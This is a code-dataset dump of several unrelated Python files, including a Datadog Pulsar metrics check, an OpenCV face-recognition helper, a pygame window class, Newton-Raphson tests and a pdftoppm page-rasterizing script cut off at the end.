| en | 0.544914 | #!/usr/bin/python muselsl <command> [<args>] Available commands: list List available Muse devices. -b --backend BLE backend to use. can be auto, bluemuse, gatt or bgapi. -i --interface The interface to use, 'hci0' for gatt or a com port for bgapi. stream Start an LSL stream from Muse headset. -a --address Device MAC address. -n --name Device name (e.g. Muse-41D2). -b --backend BLE backend to use. can be auto, bluemuse, gatt or bgapi. -i --interface The interface to use, 'hci0' for gatt or a com port for bgapi. view Visualize EEG data from an LSL stream. -w --window Window length to display in seconds. -s --scale Scale in uV. -r --refresh Refresh rate in seconds. -f --figure Window size. -v --version Viewer version (1 or 2) - 1 is the default stable version, 2 is in development (and takes no arguments). record Record EEG data from an LSL stream. -d --duration Duration of the recording in seconds. -f --filename Name of the recording file. -dj --dejitter Whether to apply dejitter correction to timestamps. record_direct Record data directly from Muse headset (no LSL). -a --address Device MAC address. -n --name Device name (e.g. Muse-41D2). -b --backend BLE backend to use. can be auto, bluemuse, gatt or bgapi. -i --interface The interface to use, 'hci0' for gatt or a com port for bgapi. # parse_args defaults to [1:] for args, but you need to # exclude the rest of the args too, or validation will fail # use dispatch pattern to invoke method with same name | 2.718368 | 3 |
src/quocspyside2interface/gui/freegradients/GeneralSettingsNM.py | Quantum-OCS/QuOCS-pyside2interface | 1 | 9121 | # ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Copyright 2021- QuOCS Team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
from qtpy import QtWidgets
from quocspyside2interface.gui.uiclasses.GeneralSettingsNMUI import Ui_Form
from quocspyside2interface.gui.freegradients.StoppingCriteriaNM import StoppingCriteriaNM
from quocspyside2interface.logic.OptimalAlgorithmDictionaries.NelderMeadDictionary import NelderMeadDictionary
class GeneralSettingsNM(QtWidgets.QWidget, Ui_Form):
def __init__(self, loaded_dictionary=None):
super().__init__()
self.setupUi(self)
nm_dictionary, stopping_criteria_dictionary = None, None
if loaded_dictionary is not None:
nm_dictionary = loaded_dictionary["general_settings"]
stopping_criteria_dictionary = loaded_dictionary["stopping_criteria"]
# Nelder Mead Dictionary
self.nelder_mead_dictionary = NelderMeadDictionary(loaded_dictionary=nm_dictionary)
# Create widget
self.stopping_criteria_form = StoppingCriteriaNM(loaded_dictionary=stopping_criteria_dictionary)
# Connection
self.is_adaptive_checkbox.stateChanged.connect(self.set_is_adaptive)
self._initialization()
def _initialization(self):
self.is_adaptive_checkbox.setChecked(self.nelder_mead_dictionary.is_adaptive)
self.stopping_criteria_scroll_area.setWidget(self.stopping_criteria_form)
def set_is_adaptive(self):
self.nelder_mead_dictionary.is_adaptive = self.is_adaptive_checkbox.isChecked()
def get_dictionary(self):
return {"dsm_settings": {"general_settings": self.nelder_mead_dictionary.get_dictionary(),
"stopping_criteria": self.stopping_criteria_form.get_dictionary()}} | # ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Copyright 2021- QuOCS Team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
from qtpy import QtWidgets
from quocspyside2interface.gui.uiclasses.GeneralSettingsNMUI import Ui_Form
from quocspyside2interface.gui.freegradients.StoppingCriteriaNM import StoppingCriteriaNM
from quocspyside2interface.logic.OptimalAlgorithmDictionaries.NelderMeadDictionary import NelderMeadDictionary
class GeneralSettingsNM(QtWidgets.QWidget, Ui_Form):
def __init__(self, loaded_dictionary=None):
super().__init__()
self.setupUi(self)
nm_dictionary, stopping_criteria_dictionary = None, None
if loaded_dictionary is not None:
nm_dictionary = loaded_dictionary["general_settings"]
stopping_criteria_dictionary = loaded_dictionary["stopping_criteria"]
# Nelder Mead Dictionary
self.nelder_mead_dictionary = NelderMeadDictionary(loaded_dictionary=nm_dictionary)
# Create widget
self.stopping_criteria_form = StoppingCriteriaNM(loaded_dictionary=stopping_criteria_dictionary)
# Connection
self.is_adaptive_checkbox.stateChanged.connect(self.set_is_adaptive)
self._initialization()
def _initialization(self):
self.is_adaptive_checkbox.setChecked(self.nelder_mead_dictionary.is_adaptive)
self.stopping_criteria_scroll_area.setWidget(self.stopping_criteria_form)
def set_is_adaptive(self):
self.nelder_mead_dictionary.is_adaptive = self.is_adaptive_checkbox.isChecked()
def get_dictionary(self):
return {"dsm_settings": {"general_settings": self.nelder_mead_dictionary.get_dictionary(),
"stopping_criteria": self.stopping_criteria_form.get_dictionary()}} | en | 0.806359 | # ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # Copyright 2021- QuOCS Team # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # Nelder Mead Dictionary # Create widget # Connection | 1.461848 | 1 |
pulsar/datadog_checks/pulsar/check.py | divyamamgai/integrations-extras | 158 | 9122 | <filename>pulsar/datadog_checks/pulsar/check.py
from datadog_checks.base import ConfigurationError, OpenMetricsBaseCheck
EVENT_TYPE = SOURCE_TYPE_NAME = 'pulsar'
class PulsarCheck(OpenMetricsBaseCheck):
"""
PulsarCheck derives from AgentCheck that provides the required check method
"""
def __init__(self, name, init_config, instances=None):
instance = instances[0]
url = instance.get('prometheus_url')
if url is None:
raise ConfigurationError("Unable to find prometheus_url in config file.")
self.NAMESPACE = 'kesque.pulsar'
self.metrics_mapper = {
'pulsar_consumer_available_permits': 'consumer.available_permits',
'pulsar_consumer_blocked_on_unacked_messages': 'consumer.blocked_on_unacked_messages',
'pulsar_consumer_msg_rate_out': 'consumer.msg_rate_out',
'pulsar_consumer_msg_rate_redeliver': 'consumer.msg_rate_redeliver',
'pulsar_consumer_msg_throughput_out': 'consumer.msg_throughput_out',
'pulsar_consumer_unacked_messages': 'consumer.unacked_messages',
'pulsar_consumers_count': 'consumers_count',
'pulsar_entry_size_count': 'entry_size_count',
'pulsar_entry_size_le_100_kb': 'entry_size_le_100_kb',
'pulsar_entry_size_le_128': 'entry_size_le_128',
'pulsar_entry_size_le_16_kb': 'entry_size_le_16_kb',
'pulsar_entry_size_le_1_kb': 'entry_size_le_1_kb',
'pulsar_entry_size_le_1_mb': 'entry_size_le_1_mb',
'pulsar_entry_size_le_2_kb': 'entry_size_le_2_kb',
'pulsar_entry_size_le_4_kb': 'entry_size_le_4_kb',
'pulsar_entry_size_le_512': 'entry_size_le_512',
'pulsar_entry_size_le_overflow': 'entry_size_le_overflow',
'pulsar_entry_size_sum': 'entry_size_sum',
'pulsar_in_bytes_total': 'in_bytes_total',
'pulsar_in_messages_total': 'in_messages_total',
'pulsar_msg_backlog': 'msg_backlog',
'pulsar_out_bytes_total': 'out_bytes_total',
'pulsar_out_messages_total': 'out_messages_total',
'pulsar_producers_count': 'producers_count',
'pulsar_rate_in': 'rate_in',
'pulsar_rate_out': 'rate_out',
'pulsar_replication_backlog': 'replication.backlog',
'pulsar_replication_rate_in': 'replication.rate_in',
'pulsar_replication_rate_out': 'replication.rate_out',
'pulsar_replication_throughput_in': 'replication.throughput_in',
'pulsar_replication_throughput_out': 'replication.throughput_out',
'pulsar_storage_backlog_quota_limit': 'storage.backlog_quota_limit',
'pulsar_storage_backlog_size': 'storage.backlog_size',
'pulsar_storage_read_rate': 'storage.read_rate',
'pulsar_storage_offloaded_size': 'storage.offloaded_size',
'pulsar_storage_size': 'storage.size',
'pulsar_storage_write_latency_count': 'storage.write_latency_count',
'pulsar_storage_write_latency_le_0_5': 'storage.write_latency_le_0_5',
'pulsar_storage_write_latency_le_1': 'storage.write_latency_le_1',
'pulsar_storage_write_latency_le_10': 'storage.write_latency_le_10',
'pulsar_storage_write_latency_le_100': 'storage.write_latency_le_100',
'pulsar_storage_write_latency_le_1000': 'storage.write_latency_le_1000',
'pulsar_storage_write_latency_le_20': 'storage.write_latency_le_20',
'pulsar_storage_write_latency_le_200': 'storage.write_latency_le_200',
'pulsar_storage_write_latency_le_5': 'storage.write_latency_le_5',
'pulsar_storage_write_latency_le_50': 'storage.write_latency_le_50',
'pulsar_storage_write_latency_overflow': 'storage.write_latency_overflow',
'pulsar_storage_write_latency_sum': 'storage.write_latency_sum',
'pulsar_storage_write_rate': 'storage.write_rate',
'pulsar_subscription_back_log': 'subscription.back_log',
'pulsar_subscription_back_log_no_delayed': 'subscription.back_log_no_delayed',
'pulsar_subscription_blocked_on_unacked_messages': 'subscription.blocked_on_unacked_messages',
'pulsar_subscription_delayed': 'subscription.delayed',
'pulsar_subscription_msg_rate_out': 'subscription.msg_rate_out',
'pulsar_subscription_msg_rate_redeliver': 'subscription.msg_rate_redeliver',
'pulsar_subscription_msg_throughput_out': 'subscription.msg_throughput_out',
'pulsar_subscription_unacked_messages': 'subscription.unacked_messages',
'pulsar_subscriptions_count': 'subscriptions.count',
'pulsar_throughput_in': 'throughput_in',
'pulsar_throughput_out': 'throughput_out',
'pulsar_topics_count': 'topics_count',
'scrape_duration_seconds': 'scrape_duration_seconds',
'scrape_samples_post_metric_relabeling': 'scrape_samples_post_metric_relabeling',
'scrape_samples_scraped': 'scrape_samples_scraped',
'topic_load_times': 'topic_load_times',
'topic_load_times_count': 'topic_load_times_count',
'topic_load_times_sum': 'topic_load_times_sum',
'up': 'broker.up',
}
instance.update(
{
'prometheus_url': url,
'namespace': self.NAMESPACE,
'metrics': [self.metrics_mapper],
'send_distribution_counts_as_monotonic': instance.get('send_distribution_counts_as_monotonic', True),
'send_distribution_sums_as_monotonic': instance.get('send_distribution_sums_as_monotonic', True),
}
)
super(PulsarCheck, self).__init__(name, init_config, instances)
| <filename>pulsar/datadog_checks/pulsar/check.py
from datadog_checks.base import ConfigurationError, OpenMetricsBaseCheck
EVENT_TYPE = SOURCE_TYPE_NAME = 'pulsar'
class PulsarCheck(OpenMetricsBaseCheck):
"""
PulsarCheck derives from AgentCheck that provides the required check method
"""
def __init__(self, name, init_config, instances=None):
instance = instances[0]
url = instance.get('prometheus_url')
if url is None:
raise ConfigurationError("Unable to find prometheus_url in config file.")
self.NAMESPACE = 'kesque.pulsar'
self.metrics_mapper = {
'pulsar_consumer_available_permits': 'consumer.available_permits',
'pulsar_consumer_blocked_on_unacked_messages': 'consumer.blocked_on_unacked_messages',
'pulsar_consumer_msg_rate_out': 'consumer.msg_rate_out',
'pulsar_consumer_msg_rate_redeliver': 'consumer.msg_rate_redeliver',
'pulsar_consumer_msg_throughput_out': 'consumer.msg_throughput_out',
'pulsar_consumer_unacked_messages': 'consumer.unacked_messages',
'pulsar_consumers_count': 'consumers_count',
'pulsar_entry_size_count': 'entry_size_count',
'pulsar_entry_size_le_100_kb': 'entry_size_le_100_kb',
'pulsar_entry_size_le_128': 'entry_size_le_128',
'pulsar_entry_size_le_16_kb': 'entry_size_le_16_kb',
'pulsar_entry_size_le_1_kb': 'entry_size_le_1_kb',
'pulsar_entry_size_le_1_mb': 'entry_size_le_1_mb',
'pulsar_entry_size_le_2_kb': 'entry_size_le_2_kb',
'pulsar_entry_size_le_4_kb': 'entry_size_le_4_kb',
'pulsar_entry_size_le_512': 'entry_size_le_512',
'pulsar_entry_size_le_overflow': 'entry_size_le_overflow',
'pulsar_entry_size_sum': 'entry_size_sum',
'pulsar_in_bytes_total': 'in_bytes_total',
'pulsar_in_messages_total': 'in_messages_total',
'pulsar_msg_backlog': 'msg_backlog',
'pulsar_out_bytes_total': 'out_bytes_total',
'pulsar_out_messages_total': 'out_messages_total',
'pulsar_producers_count': 'producers_count',
'pulsar_rate_in': 'rate_in',
'pulsar_rate_out': 'rate_out',
'pulsar_replication_backlog': 'replication.backlog',
'pulsar_replication_rate_in': 'replication.rate_in',
'pulsar_replication_rate_out': 'replication.rate_out',
'pulsar_replication_throughput_in': 'replication.throughput_in',
'pulsar_replication_throughput_out': 'replication.throughput_out',
'pulsar_storage_backlog_quota_limit': 'storage.backlog_quota_limit',
'pulsar_storage_backlog_size': 'storage.backlog_size',
'pulsar_storage_read_rate': 'storage.read_rate',
'pulsar_storage_offloaded_size': 'storage.offloaded_size',
'pulsar_storage_size': 'storage.size',
'pulsar_storage_write_latency_count': 'storage.write_latency_count',
'pulsar_storage_write_latency_le_0_5': 'storage.write_latency_le_0_5',
'pulsar_storage_write_latency_le_1': 'storage.write_latency_le_1',
'pulsar_storage_write_latency_le_10': 'storage.write_latency_le_10',
'pulsar_storage_write_latency_le_100': 'storage.write_latency_le_100',
'pulsar_storage_write_latency_le_1000': 'storage.write_latency_le_1000',
'pulsar_storage_write_latency_le_20': 'storage.write_latency_le_20',
'pulsar_storage_write_latency_le_200': 'storage.write_latency_le_200',
'pulsar_storage_write_latency_le_5': 'storage.write_latency_le_5',
'pulsar_storage_write_latency_le_50': 'storage.write_latency_le_50',
'pulsar_storage_write_latency_overflow': 'storage.write_latency_overflow',
'pulsar_storage_write_latency_sum': 'storage.write_latency_sum',
'pulsar_storage_write_rate': 'storage.write_rate',
'pulsar_subscription_back_log': 'subscription.back_log',
'pulsar_subscription_back_log_no_delayed': 'subscription.back_log_no_delayed',
'pulsar_subscription_blocked_on_unacked_messages': 'subscription.blocked_on_unacked_messages',
'pulsar_subscription_delayed': 'subscription.delayed',
'pulsar_subscription_msg_rate_out': 'subscription.msg_rate_out',
'pulsar_subscription_msg_rate_redeliver': 'subscription.msg_rate_redeliver',
'pulsar_subscription_msg_throughput_out': 'subscription.msg_throughput_out',
'pulsar_subscription_unacked_messages': 'subscription.unacked_messages',
'pulsar_subscriptions_count': 'subscriptions.count',
'pulsar_throughput_in': 'throughput_in',
'pulsar_throughput_out': 'throughput_out',
'pulsar_topics_count': 'topics_count',
'scrape_duration_seconds': 'scrape_duration_seconds',
'scrape_samples_post_metric_relabeling': 'scrape_samples_post_metric_relabeling',
'scrape_samples_scraped': 'scrape_samples_scraped',
'topic_load_times': 'topic_load_times',
'topic_load_times_count': 'topic_load_times_count',
'topic_load_times_sum': 'topic_load_times_sum',
'up': 'broker.up',
}
instance.update(
{
'prometheus_url': url,
'namespace': self.NAMESPACE,
'metrics': [self.metrics_mapper],
'send_distribution_counts_as_monotonic': instance.get('send_distribution_counts_as_monotonic', True),
'send_distribution_sums_as_monotonic': instance.get('send_distribution_sums_as_monotonic', True),
}
)
super(PulsarCheck, self).__init__(name, init_config, instances)
| en | 0.794721 | PulsarCheck derives from AgentCheck that provides the required check method | 2.239444 | 2 |
Chapter11/publish_horoscope1_in_another_ipns.py | HowToBeCalculated/Hands-On-Blockchain-for-Python-Developers | 62 | 9123 | import ipfsapi
c = ipfsapi.connect()
peer_id = c.key_list()['Keys'][1]['Id']
c.name_publish('QmYjYGKXqo36GDt6f6qvp9qKAsrc72R9y88mQSLvogu8Ub', key='another_key')
result = c.cat('/ipns/' + peer_id)
print(result)
| import ipfsapi
c = ipfsapi.connect()
peer_id = c.key_list()['Keys'][1]['Id']
c.name_publish('QmYjYGKXqo36GDt6f6qvp9qKAsrc72R9y88mQSLvogu8Ub', key='another_key')
result = c.cat('/ipns/' + peer_id)
print(result)
| none | 1 | 2.083699 | 2 |
|
magie/window.py | NiumXp/Magie | 1 | 9124 | <filename>magie/window.py<gh_stars>1-10
import pygame
class Window:
def __init__(self, title: str, dimension: tuple):
self.surface = None
self.initial_title = title
self.initial_dimension = dimension
@property
def title(self) -> str:
"""Returns the title of the window."""
return pygame.display.get_caption()
@title.setter
def title(self, new_title: str):
"""Sets the window title."""
pygame.display.set_caption(new_title)
def set_title(self, new_title: str):
"""Alias for `Window.title = ...`."""
self.title = new_title
@property
def width(self) -> int:
"""Alias for Window.get_width."""
return self.get_width()
@property
def height(self) -> int:
"""Alias for Window.get_height."""
return self.get_height()
@property
def size(self) -> tuple:
"""Alias for Window.get_size."""
return self.get_size()
def get_width(self) -> int:
"""Returns the widget of the window."""
if self.surface:
return self.surface.get_width()
return self.initial_dimension[0]
def get_height(self) -> int:
"""Returns the height of the window."""
if self.surface:
return self.surface.get_height()
return self.initial_dimension[1]
def get_size(self) -> tuple:
"""Returns the size of the size."""
if self.surface:
return self.surface.get_size()
return self.initial_dimension
def build(self):
"""Build the window."""
self.surface = pygame.display.set_mode(self.initial_dimension)
self.set_title(self.initial_title)
return self
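# Example usage (illustrative sketch -- assumes pygame.init() has been called
# and that the event loop / display flipping is handled elsewhere):
#   window = Window("My Game", (800, 600)).build()
#   window.set_title("Paused")
#   print(window.size)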
| <filename>magie/window.py<gh_stars>1-10
import pygame
class Window:
def __init__(self, title: str, dimension: tuple):
self.surface = None
self.initial_title = title
self.initial_dimension = dimension
@property
def title(self) -> str:
"""Returns the title of the window."""
return pygame.display.get_caption()
@title.setter
def title(self, new_title: str):
"""Sets the window title."""
pygame.display.set_caption(new_title)
def set_title(self, new_title: str):
"""Alias for `Window.title = ...`."""
self.title = new_title
@property
def width(self) -> int:
"""Alias for Window.get_width."""
return self.get_width()
@property
def height(self) -> int:
"""Alias for Window.get_height."""
return self.get_height()
@property
def size(self) -> tuple:
"""Alias for Window.get_size."""
return self.get_size()
def get_width(self) -> int:
"""Returns the widget of the window."""
if self.surface:
return self.surface.get_width()
return self.initial_dimension[0]
def get_height(self) -> int:
"""Returns the height of the window."""
if self.surface:
return self.surface.get_height()
return self.initial_dimension[1]
def get_size(self) -> tuple:
"""Returns the size of the size."""
if self.surface:
return self.surface.get_size()
return self.initial_dimension
def build(self):
"""Build the window."""
self.surface = pygame.display.set_mode(self.initial_dimension)
self.set_title(self.initial_title)
return self
| en | 0.625734 | Returns the title of the window. Sets the window title. Alias for `Window.title = ...`. Alias for Window.get_width. Alias for Window.get_height. Alias for Window.get_size. Returns the widget of the window. Returns the height of the window. Returns the size of the size. Build the window. | 3.242368 | 3 |
tests/optimize/test_newton_raphson_hypo.py | dwillmer/fastats | 26 | 9125 | <gh_stars>10-100
from hypothesis import given, assume, settings
from hypothesis.strategies import floats
from numpy import cos
from pytest import approx
from fastats.optimise.newton_raphson import newton_raphson
def func(x):
return x**3 - x - 1
def less_or_equal(x, compared_to, rel=1e-6):
return ((x < compared_to)
or ((x - compared_to) == approx(0.0, rel=rel))
or (x == approx(x, rel=rel)))
nr_func = newton_raphson(1, 1e-6, root=func, return_callable=True)
@given(floats(min_value=0.01, max_value=3.5))
def test_minimal(x):
"""
Tests that the value output from the solver
is less than or equal to the value of the
objective.
"""
eps = 1e-12
value = nr_func(x, eps)
assume(func(x) > 0.0)
assert less_or_equal(value, compared_to=func(x))
def cos_func(x):
return cos(x) - 2 * x
nr_cos = newton_raphson(0.5, 1e-6, root=cos_func, return_callable=True)
@given(floats(min_value=0.3, max_value=0.8))
@settings(deadline=None)
def test_cos_minus_2x(x):
value = nr_cos(x, 1e-6)
assert less_or_equal(value, compared_to=cos_func(x))
if __name__ == '__main__':
import pytest
pytest.main([__file__])
| from hypothesis import given, assume, settings
from hypothesis.strategies import floats
from numpy import cos
from pytest import approx
from fastats.optimise.newton_raphson import newton_raphson
def func(x):
return x**3 - x - 1
def less_or_equal(x, compared_to, rel=1e-6):
return ((x < compared_to)
or ((x - compared_to) == approx(0.0, rel=rel))
or (x == approx(x, rel=rel)))
nr_func = newton_raphson(1, 1e-6, root=func, return_callable=True)
@given(floats(min_value=0.01, max_value=3.5))
def test_minimal(x):
"""
Tests that the value output from the solver
is less than or equal to the value of the
objective.
"""
eps = 1e-12
value = nr_func(x, eps)
assume(func(x) > 0.0)
assert less_or_equal(value, compared_to=func(x))
def cos_func(x):
return cos(x) - 2 * x
nr_cos = newton_raphson(0.5, 1e-6, root=cos_func, return_callable=True)
@given(floats(min_value=0.3, max_value=0.8))
@settings(deadline=None)
def test_cos_minus_2x(x):
value = nr_cos(x, 1e-6)
assert less_or_equal(value, compared_to=cos_func(x))
if __name__ == '__main__':
import pytest
pytest.main([__file__]) | en | 0.951294 | Tests that the value output from the solver is less than or equal to the value of the objective. | 2.578547 | 3 |
faceRecognition.py | sequery/Face-Recognition-Project | 2 | 9126 | import cv2
import os
import numpy as np
# This module contains all common functions that are called in tester.py file
# Given an image, the function below returns rectangles for detected faces along with the grayscale image
def faceDetection(test_img):
gray_img = cv2.cvtColor(test_img, cv2.COLOR_BGR2GRAY) # convert color image to grayscale
face_haar_cascade = cv2.CascadeClassifier('HaarCascade/haarcascade_frontalface_default.xml') # Load haar classifier
faces = face_haar_cascade.detectMultiScale(gray_img, scaleFactor=1.32,
minNeighbors=5) # detectMultiScale returns rectangles
return faces, gray_img
# Given a directory below function returns part of gray_img which is face alongwith its label/ID
def labels_for_training_data(directory):
faces = []
faceID = []
for path, subdirnames, filenames in os.walk(directory):
for filename in filenames:
if filename.startswith("."):
print("Skipping system file") # Skipping files that startwith .
continue
id = os.path.basename(path) # fetching subdirectory names
img_path = os.path.join(path, filename) # fetching image path
print("img_path:", img_path)
print("id:", id)
test_img = cv2.imread(img_path) # loading each image one by one
if test_img is None:
print("Image not loaded properly")
continue
faces_rect, gray_img = faceDetection(
test_img) # Calling faceDetection function to return faces detected in particular image
if len(faces_rect) != 1:
continue # Since we are assuming only single person images are being fed to classifier
(x, y, w, h) = faces_rect[0]
roi_gray = gray_img[y:y + w, x:x + h] # cropping region of interest i.e. face area from grayscale image
faces.append(roi_gray)
faceID.append(int(id))
return faces, faceID
# Below function trains haar classifier and takes faces,faceID returned by previous function as its arguments
def train_classifier(faces, faceID):
face_recognizer = cv2.face.LBPHFaceRecognizer_create()
face_recognizer.train(faces, np.array(faceID))
return face_recognizer
# Below function draws bounding boxes around detected face in image
def draw_rect(test_img, face):
(x, y, w, h) = face
cv2.rectangle(test_img, (x, y), (x + w, y + h), (255, 0, 0), thickness=5)
# Below function writes name of person for detected label
def put_text(test_img, text, x, y):
cv2.putText(test_img, text, (x, y), cv2.FONT_HERSHEY_DUPLEX, 2, (255, 0, 0), 4)
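# Example usage (illustrative sketch -- the "trainingImages" directory and test
# image path are assumptions, not part of this module):
#   faces, faceID = labels_for_training_data("trainingImages")
#   face_recognizer = train_classifier(faces, faceID)
#   test_img = cv2.imread("test.jpg")
#   faces_detected, gray_img = faceDetection(test_img)
#   for (x, y, w, h) in faces_detected:
#       label, confidence = face_recognizer.predict(gray_img[y:y + h, x:x + w])
#       draw_rect(test_img, (x, y, w, h))
#       put_text(test_img, str(label), x, y)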
| import cv2
import os
import numpy as np
# This module contains all common functions that are called in tester.py file
# Given an image, the function below returns rectangles for detected faces along with the grayscale image
def faceDetection(test_img):
gray_img = cv2.cvtColor(test_img, cv2.COLOR_BGR2GRAY) # convert color image to grayscale
face_haar_cascade = cv2.CascadeClassifier('HaarCascade/haarcascade_frontalface_default.xml') # Load haar classifier
faces = face_haar_cascade.detectMultiScale(gray_img, scaleFactor=1.32,
minNeighbors=5) # detectMultiScale returns rectangles
return faces, gray_img
# Given a directory below function returns part of gray_img which is face alongwith its label/ID
def labels_for_training_data(directory):
faces = []
faceID = []
for path, subdirnames, filenames in os.walk(directory):
for filename in filenames:
if filename.startswith("."):
print("Skipping system file") # Skipping files that startwith .
continue
id = os.path.basename(path) # fetching subdirectory names
img_path = os.path.join(path, filename) # fetching image path
print("img_path:", img_path)
print("id:", id)
test_img = cv2.imread(img_path) # loading each image one by one
if test_img is None:
print("Image not loaded properly")
continue
faces_rect, gray_img = faceDetection(
test_img) # Calling faceDetection function to return faces detected in particular image
if len(faces_rect) != 1:
continue # Since we are assuming only single person images are being fed to classifier
(x, y, w, h) = faces_rect[0]
roi_gray = gray_img[y:y + w, x:x + h] # cropping region of interest i.e. face area from grayscale image
faces.append(roi_gray)
faceID.append(int(id))
return faces, faceID
# Below function trains haar classifier and takes faces,faceID returned by previous function as its arguments
def train_classifier(faces, faceID):
face_recognizer = cv2.face.LBPHFaceRecognizer_create()
face_recognizer.train(faces, np.array(faceID))
return face_recognizer
# Below function draws bounding boxes around detected face in image
def draw_rect(test_img, face):
(x, y, w, h) = face
cv2.rectangle(test_img, (x, y), (x + w, y + h), (255, 0, 0), thickness=5)
# Below function writes name of person for detected label
def put_text(test_img, text, x, y):
cv2.putText(test_img, text, (x, y), cv2.FONT_HERSHEY_DUPLEX, 2, (255, 0, 0), 4)
| en | 0.844148 | # This module contains all common functions that are called in tester.py file # Given an image below function returns rectangle for face detected alongwith gray scale image # convert color image to grayscale # Load haar classifier # detectMultiScale returns rectangles # Given a directory below function returns part of gray_img which is face alongwith its label/ID # Skipping files that startwith . # fetching subdirectory names # fetching image path # loading each image one by one # Calling faceDetection function to return faces detected in particular image # Since we are assuming only single person images are being fed to classifier # cropping region of interest i.e. face area from grayscale image # Below function trains haar classifier and takes faces,faceID returned by previous function as its arguments # Below function draws bounding boxes around detected face in image # Below function writes name of person for detected label | 2.918586 | 3 |
evaluation/datasets/build_dataset_images.py | hsiehkl/pdffigures2 | 296 | 9127 | <filename>evaluation/datasets/build_dataset_images.py
import argparse
from os import listdir, mkdir
from os.path import join, isdir
from subprocess import call
import sys
import datasets
from shutil import which
"""
Script to use pdftoppm to turn the pdfs into single images per page
"""
def get_images(pdf_dir, output_dir, dpi, mono=True):
if which("pdftoppm") is None:
raise ValueError("Requires executable pdftopmm to be on the PATH")
if not isdir(output_dir):
print("Making %s to store rasterized PDF pages" % output_dir)
mkdir(output_dir)
if not isdir(pdf_dir):
raise ValueError(pdf_dir + " is not a directory")
pdf_doc_ids = [x.split(".pdf")[0] for x in listdir(pdf_dir)]
already_have = set()
for filename in listdir(output_dir):
if "-page" not in filename:
raise ValueError()
doc_id = filename.split("-page")[0]
if doc_id not in pdf_doc_ids:
raise ValueError("doc id %s in output dir not found in pdfs" % doc_id)
already_have.add(doc_id)
if len(already_have) != 0:
print("Already have %d docs" % len(already_have))
num_pdfs = len(listdir(pdf_dir))
for (i, pdfname) in enumerate(listdir(pdf_dir)):
if not pdfname.endswith(".pdf"):
raise ValueError()
doc_id = pdfname[:-4]
if doc_id in already_have:
continue
print("Creating images for pdf %s (%d / %d)" % (pdfname, i + 1, num_pdfs))
if (mono):
args = ["pdftoppm", "-gray", "-r", str(dpi),
"-aa", "no", "-aaVector", "no", "-cropbox",
join(pdf_dir, pdfname), join(output_dir, doc_id + "-page")]
else:
args = ["pdftoppm", "-jpeg", "-r", str(dpi), "-cropbox",
join(pdf_dir, pdfname), join(output_dir, doc_id + "-page")]
retcode = call(args)
if retcode != 0:
raise ValueError("Bad return code for <%s> (%d)", " ".join(args), retcode)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Cache rasterized page images for a dataset')
parser.add_argument("dataset", choices=datasets.DATASETS.keys(), help="target dataset")
parser.add_argument("color", choices=["gray", "color"], help="kind of images to render")
args = parser.parse_args()
dataset = datasets.get_dataset(args.dataset)
print("Running on dataset: " + dataset.name)
if args.color == "gray":
get_images(dataset.pdf_dir, dataset.page_images_gray_dir,
dataset.IMAGE_DPI, True)
elif args.color == "color":
get_images(dataset.pdf_dir, dataset.page_images_color_dir,
dataset.COLOR_IMAGE_DPI, False)
else:
exit(1)
| <filename>evaluation/datasets/build_dataset_images.py
import argparse
from os import listdir, mkdir
from os.path import join, isdir
from subprocess import call
import sys
import datasets
from shutil import which
"""
Script to use pdftoppm to turn the pdfs into single images per page
"""
def get_images(pdf_dir, output_dir, dpi, mono=True):
if which("pdftoppm") is None:
raise ValueError("Requires executable pdftopmm to be on the PATH")
if not isdir(output_dir):
print("Making %s to store rasterized PDF pages" % output_dir)
mkdir(output_dir)
if not isdir(pdf_dir):
raise ValueError(pdf_dir + " is not a directory")
pdf_doc_ids = [x.split(".pdf")[0] for x in listdir(pdf_dir)]
already_have = set()
for filename in listdir(output_dir):
if "-page" not in filename:
raise ValueError()
doc_id = filename.split("-page")[0]
if doc_id not in pdf_doc_ids:
raise ValueError("doc id %s in output dir not found in pdfs" % doc_id)
already_have.add(doc_id)
if len(already_have) != 0:
print("Already have %d docs" % len(already_have))
num_pdfs = len(listdir(pdf_dir))
for (i, pdfname) in enumerate(listdir(pdf_dir)):
if not pdfname.endswith(".pdf"):
raise ValueError()
doc_id = pdfname[:-4]
if doc_id in already_have:
continue
print("Creating images for pdf %s (%d / %d)" % (pdfname, i + 1, num_pdfs))
if (mono):
args = ["pdftoppm", "-gray", "-r", str(dpi),
"-aa", "no", "-aaVector", "no", "-cropbox",
join(pdf_dir, pdfname), join(output_dir, doc_id + "-page")]
else:
args = ["pdftoppm", "-jpeg", "-r", str(dpi), "-cropbox",
join(pdf_dir, pdfname), join(output_dir, doc_id + "-page")]
retcode = call(args)
if retcode != 0:
raise ValueError("Bad return code for <%s> (%d)", " ".join(args), retcode)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Cache rasterized page images for a dataset')
parser.add_argument("dataset", choices=datasets.DATASETS.keys(), help="target dataset")
